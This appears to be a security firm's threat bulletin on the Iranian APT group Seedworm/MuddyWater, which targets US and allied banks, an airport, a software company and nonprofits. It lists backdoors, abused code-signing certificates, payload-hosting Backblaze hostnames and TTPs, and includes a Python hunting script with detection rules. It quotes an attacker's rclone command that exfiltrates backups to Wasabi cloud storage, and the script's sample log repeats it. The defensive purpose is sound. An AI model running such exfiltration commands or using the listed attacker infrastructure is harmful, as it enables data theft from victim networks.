Earlier this week we wrote a blog post on the cyber affairs surrounding the US-Israel war on Iran (Operation Epic Fury), in which we assessed that state-sponsored threat actors would respond with elevated activity against Western organisations with a Middle Eastern presence, in retaliation for these attacks.
However, recent analysis from threat intelligence researchers reveals a notable increase in malicious cyber activity since our last blog post, attributed to the Iranian state-aligned Advanced Persistent Threat (APT) group Seedworm (also known as MuddyWater, TEMP.Zagros, or Static Kitten). This activity has directly affected multiple U.S. organizations across critical sectors and aligns with elevated geopolitical tensions following recent military actions in the Middle East.
Key Findings –
1. Targeted U.S. & Allied Organisations
Seedworm activity, first detected in early February 2026, has been observed across several high-value networks:
• A U.S. bank
• A U.S. airport
• A U.S. software company (with an Israeli presence)
• Nonprofit organizations in both the U.S. and Canada
These intrusions have continued into early March, indicating an active and ongoing campaign.
2. Newly Identified Backdoors & Malware
Researchers identified multiple malware families deployed across victim environments:
• Dindoor backdoor:
o Previously unknown
o Uses the Deno JavaScript/TypeScript runtime
o Found across the Israeli branch of the targeted software company, the U.S. bank, and a Canadian nonprofit
o Signed with a certificate issued to “Amy Cherne”
• Fakeset backdoor (Python-based):
o Found in the U.S. airport and another non-profit
o Signed with certificates tied to “Amy Cherne” and “Donald Gay” (previously used in Seedworm malware)
• Stagecomp → Darkcomp malware chain:
o Also signed using the “Donald Gay” certificate
o Linked to Seedworm by major vendors including Google, Microsoft, and Kaspersky
These malware implants demonstrate a diverse toolset and indicate deliberate supply-chain, financial, and critical-infrastructure targeting.
3. Data Exfiltration Attempts
In at least one case, attackers attempted to exfiltrate data from the targeted software company using Rclone to a Wasabi cloud storage bucket, though the success of this attempt remains unconfirmed.
4. Infrastructure & Delivery
• Malware delivery leveraged Backblaze cloud storage servers, indicating Seedworm's use of reputable cloud infrastructure for command-and-control and payload distribution.
• Use of code-signing certificates (including previously observed malicious ones) suggests a persistent effort to appear legitimate and bypass detection.
TTPs (Tactics, Techniques, and Procedures) & IOCs (Indicators of Compromise)
MuddyWater constantly evolves to evade detection, leveraging a mix of custom malware and "living-off-the-land" techniques.
• Initial Access: Primarily uses spearphishing with macro-enabled documents (ZIP, PDF, XLSM), often utilizing lures like fake job offers.
• Execution & Persistence: Heavily utilizes obfuscated PowerShell, DLL side-loading (e.g., goopdate.dll), and RMM tools like Atera or ScreenConnect. They often compile code on target machines to avoid file-based detection.
• Malware Arsenal: Deploys tools such as POWERSTATS, Mori, Canopy (Starwhale), MuddyRot, UDPGangster, and Phoenix.
• Defense Evasion: Employs anti-analysis/anti-forensics, including sandbox detection and log clearing.
Recent Campaigns & Developments (2025-2026)
• Operation Olalampo (Feb 2026): Targeted high-profile entities.
• Targeting: Ongoing campaigns target Western and Middle Eastern financial/government entities.
• Mobile: Linked to DCHSpy, a modular Android spyware.
Current and Previously Observed TTPs –
1. Malware Families / Backdoors
These malware families were observed across multiple U.S., Canadian, and Israeli victim networks:
• Dindoor Backdoor – a previously unknown backdoor using the Deno JavaScript/TypeScript runtime.
• Fakeset Backdoor – Python-based backdoor deployed in U.S. airport and non-profit networks.
• Stagecomp Loader → Darkcomp Backdoor – Stagecomp drops and loads Darkcomp; linked to Seedworm by Google, Microsoft, and Kaspersky.
2. Malicious Code-Signing Certificates
Seedworm is known for abusing fraudulent or compromised code-signing certificates. The following were directly tied to this campaign:
• Certificate issued to “Amy Cherne” – used to sign Dindoor and Fakeset backdoors.
• Certificate issued to “Donald Gay” – used to sign Fakeset and Stagecomp malware, previously seen in Seedworm activity.
3. Malicious or Suspicious Infrastructure
Payload Hosting (Backblaze B2 Cloud Storage)
Used as malware distribution servers:
• gitempire.s3.us-east-005.backblazeb2.com
• elvenforest.s3.us-east-005.backblazeb2.com
Data Exfiltration Destination (Rclone to Wasabi Cloud Storage)
• Attempted exfiltration using:
rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x
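The certificate and infrastructure indicators above can be turned into a simple hunt. The following is an added example (not code from the original bulletin or from any vendor named in it): it matches the two Backblaze B2 hostnames against web-proxy entries, looks for rclone copies to a Wasabi remote in process-creation entries, and compares the signer name of signed binaries against the two abused certificate subjects. The log formats, sample lines, hostnames of benign traffic, file paths, bucket name and thumbprints are constructed for the example; only the Backblaze hosts, the signer names and the rclone-to-Wasabi technique come from the bulletin.

```python
import re
from dataclasses import dataclass

# Indicators taken from the bulletin: payload-hosting buckets on Backblaze B2
# and the subject names on the abused code-signing certificates.
MALICIOUS_HOSTS = {
    "gitempire.s3.us-east-005.backblazeb2.com",
    "elvenforest.s3.us-east-005.backblazeb2.com",
}
MALICIOUS_SIGNERS = {"amy cherne", "donald gay"}

# Exfiltration technique from the bulletin: rclone copying a local path to a
# Wasabi remote. The remote name is whatever the operator configured, so the
# rule keys on the "wasabi:" remote prefix rather than on a bucket name.
RCLONE_WASABI = re.compile(r"\brclone\b.*\bcopy\b.*\bwasabi:", re.IGNORECASE)


@dataclass
class Finding:
    source: str     # which log the hit came from
    indicator: str  # which IoC or rule fired
    line: str       # the raw log line, kept for the analyst


def scan_proxy_log(lines):
    """Flag proxy entries whose destination host is a known payload-hosting bucket."""
    hits = []
    for line in lines:
        # Constructed format: "<ts> <src_ip> <method> <host> <path> <status>"
        fields = line.split()
        if len(fields) < 4:
            continue
        host = fields[3].lower()
        if host in MALICIOUS_HOSTS:
            hits.append(Finding("proxy", host, line))
    return hits


def scan_process_log(lines):
    """Flag process-creation entries that run rclone against a Wasabi remote."""
    hits = []
    for line in lines:
        if RCLONE_WASABI.search(line):
            hits.append(Finding("process", "rclone->wasabi", line))
    return hits


def scan_signer_inventory(lines):
    """Flag signed binaries whose certificate subject matches an abused signer."""
    hits = []
    for line in lines:
        # Constructed format: "<path>|<signer subject CN>|<thumbprint>"
        parts = line.split("|")
        if len(parts) != 3:
            continue
        signer = parts[1].strip()
        if signer.lower() in MALICIOUS_SIGNERS:
            hits.append(Finding("signer", signer, line))
    return hits


# Constructed sample logs; not data from any real incident.
PROXY_LOG = [
    "2026-02-03T09:14:22Z 10.1.4.23 GET gitempire.s3.us-east-005.backblazeb2.com /file/gitempire/update.zip 200",
    "2026-02-03T09:15:01Z 10.1.4.23 GET www.example.com /index.html 200",
    "2026-02-03T09:20:45Z 10.1.7.8 GET elvenforest.s3.us-east-005.backblazeb2.com /file/elvenforest/setup.exe 200",
]
PROCESS_LOG = [
    r'2026-02-04T02:11:09Z host=WS-114 user=svc_backup cmd="rclone copy C:\backups wasabi:bucket-placeholder/192.168.0.x"',
    r'2026-02-04T02:12:00Z host=WS-114 user=svc_backup cmd="rclone sync C:\backups \\fileserver\backups"',
]
SIGNER_INVENTORY = [
    r"C:\Users\Public\sample_a.exe|Amy Cherne|THUMBPRINT-PLACEHOLDER-1",
    r"C:\Program Files\Vendor\app.exe|Example Vendor Ltd|THUMBPRINT-PLACEHOLDER-2",
    r"C:\Users\Public\sample_b.dll|Donald Gay|THUMBPRINT-PLACEHOLDER-3",
]


def summarize():
    """Run all three scans over the sample logs and count hits per source."""
    findings = (
        scan_proxy_log(PROXY_LOG)
        + scan_process_log(PROCESS_LOG)
        + scan_signer_inventory(SIGNER_INVENTORY)
    )
    counts = {}
    for f in findings:
        counts[f.source] = counts.get(f.source, 0) + 1
    return counts


if __name__ == "__main__":
    for f in (scan_proxy_log(PROXY_LOG) + scan_process_log(PROCESS_LOG)
              + scan_signer_inventory(SIGNER_INVENTORY)):
        print(f"[{f.source}] {f.indicator}: {f.line}")
    print(summarize())  # {'proxy': 2, 'process': 1, 'signer': 2}
```

The proxy rule is an exact match on the two hostnames the bulletin lists; widening it to the whole Backblaze B2 endpoint domain would catch new buckets but also legitimate B2 traffic, so that is a tuning decision for each environment. The rclone rule deliberately ignores the bucket name, since the bulletin redacts it, and will also fire on legitimate backup jobs that use Wasabi; pair it with an allow-list of approved backup accounts before alerting on it.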
What this shows
This campaign shows a clear intent by Iranian threat actors to infiltrate U.S. and allied networks across the finance, aviation, software, and nonprofit sectors. The combination of new backdoors, known malware families, cloud-based C2, and attempted exfiltration suggests a multi-stage operational approach, likely aimed at long-term access, espionage, or future disruptive actions.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively Get in touch to find out how you can protect your organisation.